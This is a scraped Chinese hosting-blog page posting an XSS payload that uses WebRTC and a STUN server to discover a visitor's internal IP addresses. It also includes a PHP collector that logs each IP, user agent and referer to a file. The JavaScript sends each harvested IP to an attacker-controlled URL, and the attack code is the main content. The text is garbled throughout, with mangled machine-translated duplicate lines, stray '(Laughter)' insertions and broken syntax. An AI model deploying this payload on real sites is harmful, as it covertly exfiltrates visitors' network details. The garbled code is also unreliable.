xss-利用webrtc获取内网IP

主机参考：VPS测评参考推荐/专注分享VPS服务器优惠信息！若您是商家可以在本站进行投稿，查看详情！此外我们还提供软文收录、PayPal代付、广告赞助等服务，查看详情！

我们发布的部分优惠活动文章可能存在时效性，购买时建议在本站搜索商家名称可查看相关文章充分了解该商家！若非中文页面可使用Edge浏览器同步翻译！PayPal代付/收录合作

x ss.js

fun c ti o n g e tIPs(ca l l b ac k){

func tion getIPs(callb ack){

v a r ip_dups = {};

var_dups={};

//com patibility for firefox and chrome

com patibility for firefox and chrome

var RTCPeerConne ct ion = win do w.RTCPeerConnect ion

RTCPeerConnection= win do w.RTCPeerConnection

|| window.mozRTCPeerConnection

window.mozRTCPeerConnection

|| window.webkitRTCPeerConnection;

Window.webkitRTCPeerConnection

var useWebKit = !!window.webkitRTCPeerConnection;

WebKit=!! window.webkitRTCPeerConnection;

//bypass nai ve webrtc blocking using an iframe

nai ve bypass webrtc blocking using an iframe

if(!RTCPeerConnection){

if(! RTCPeerConnection){

//NOTE: you need to have an iframe in the page right above the script tag

Note: you need to have an iframe in the page right above the script tag

(Laughter)

//<iframe id="iframe" sandbox="allow-same-origin" gt;</iframegt;

iframe id="iframe""sandbox="allow-same-origin"gt;</iframegt;

//<scriptgt;...getIPs called in here...

getIPs called in here...

(Laughter)

var win = iframe.co nt entWindow;

var win= iframe.contentWindow;

RTCPeerConnection = win.RTCPeerConnection

RTCPeerConnection= win.RTCPeerConnection

|| win.mozRTCPeerConnection

win.mozRTCPeerConnection

|| win.webkitRTCPeerConnection;

win.webkitRTCPeerConnection;

useWebKit = !!win.webkitRTCPeerConnection;

WebKit=!! win.webkitRTCPeerConnection;

}

(Laughter)

//minimal req uirements for data connection

Minimum requirements for data connection

var mediaConstraints = {

mediaConstraints={

optional: [{RtpDataChannels: true}]

Optional: [{RtpDataChannels: true}]

};

(Laughter)

var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};

[urls: stun:stun.services.mozilla.com]};

//construct a new RTCPeerConnection

Construct a new RTCPeerConnection

var pc = new RTCPeerConnection(servers, mediaConstraints);

var pc= new RTCPeerConnection (servers, mediaConstraints);

function handleCandidate(candidate){

Candidate(candidate){

//match just the IP address

match just the IP address

var ip_regex = /([0-9]{1,3}(.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/

var ip_regex = /([0-9]{1,3}([0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/

var ip_addr = ip_regex.exec(candidate)[1];

var_addr= ip_regex.exec(candidate)[1];

//remove duplicates

remove duplicates

if(ip_dups[ip_addr] === undefined)

undefined)

callback(ip_addr);

ip_addr;

ip_dups[ip_addr] = true;

ip_dups[ip_addr]= true;

}

(Laughter)

//listen for candidate events

list for candidate events

pc.onicecandidate = function(ice){

_Other Organiser

//skip non-candidate events

skip non-candidate events

if(ice.candidate)

ice candidate

handleCandidate(ice.candidate.candidate);

Candidate (ice.candidate.candidate) handler;

};

(Laughter)

//create a bogus data channel

create a false data channel

pc.createDataChannel("");

//create an offer sdp

create the sdp tool

pc.createOffer(function(result){

createOffer(function(result){

//trigger the stun server request

trigger the stun server request

pc.setLocalDescription(result, function(){}, function(){});

pc.setLocalDescription(result, function({}, function({});

}, function(){});

function({});

//wait for a while to let everyt hing done

wait for a while to let everything done

setTimeout(function(){

//read candidate info from local description

read candidate info from local description

var lines = pc.localDescription.sdp.sp lit('n');

was lines= pc.localDescription.sdp.split('n');

lines.forEach(function(line){

if(line.indexOf('a=candidate:') === 0)

(line.indexOf('a=candidate:')=== 0)

handleCandidate(line);

Candidate (line);

});

);

}, 1000);

1000);

}

(Laughter)

//insert IP addresses into the page

insert IP addresses into the page

getIPs(function(ip){ var url="http://192.168.80.133:81/aaa.php?ip="+ip;

getIPs(function(ip){ var url="http://192.168.80.133:81/aaa.php? ip="+ip;

var xmlhttp1=new XMLHttpRequest();

“var xmlhttp1=new XMLHttpRequest();”

xmlhttp1.open("GET", url, true);

xmlhttp1.open("GET",url, true);

xmlhttp1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

xmlhttps.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

xmlhttp1.send(null); });

xmlhttp1.send(null); );

server端:

server:

<?php

<? php

$ip=$_GET['ip'];

$time=date("j F, Y, g:i a");

$agent = $_SERVER['HTTP_USER_AGENT'];

$agent=$_SERVER['HTTP_USER_AGENT'];

$referer=getenv('HTTP_REFERER');

$text = 'ip:' =.$ip."rn".'Time:'.$time."rn".'User Agent:'.$agent."rn".'Referer:'.$referer."rn";

$text='ip:' =.$ip."rn".'Time:'.$time."rn".'User Agent:'.$agent."rn".'Referer:'.$referer."rn";

$file = fopen('vb.php' , 'a+');

$file = fopen('vb.php', 'a+');

fwrite($file,$text);

fclose($file);

?gt;

What? gt;

--------------------------------------------------------------
主机参考，收集国内外VPS，VPS 测评，主机测评，云服务器，虚拟主机，独立服务器，国内外服务器，高性价比建站主机相关优惠信息@zhujicankao.com
详细介绍和测评国外 VPS 主机,云服务器,国外服务器,国外主机的相关优惠信息,商家背景,网络带宽等等,也是目前国内最好的主机云服务器 VPS参考测评资讯优惠信息分享平台

这几篇文章你可能也喜欢：

本文由主机参考刊发，转载请注明：xss-利用webrtc获取内网IP https://zhujicankao.com/14137.html

xss-利用webrtc获取内网IP

这几篇文章你可能也喜欢：

相关推荐

评论抢沙发

评论前必须登录！

联系我们

热门文章

联系我们

去评论

回顶部

这几篇文章你可能也喜欢：

相关推荐

评论 抢沙发

评论前必须登录！

联系我们

热门文章

联系我们

去评论

回顶部

评论抢沙发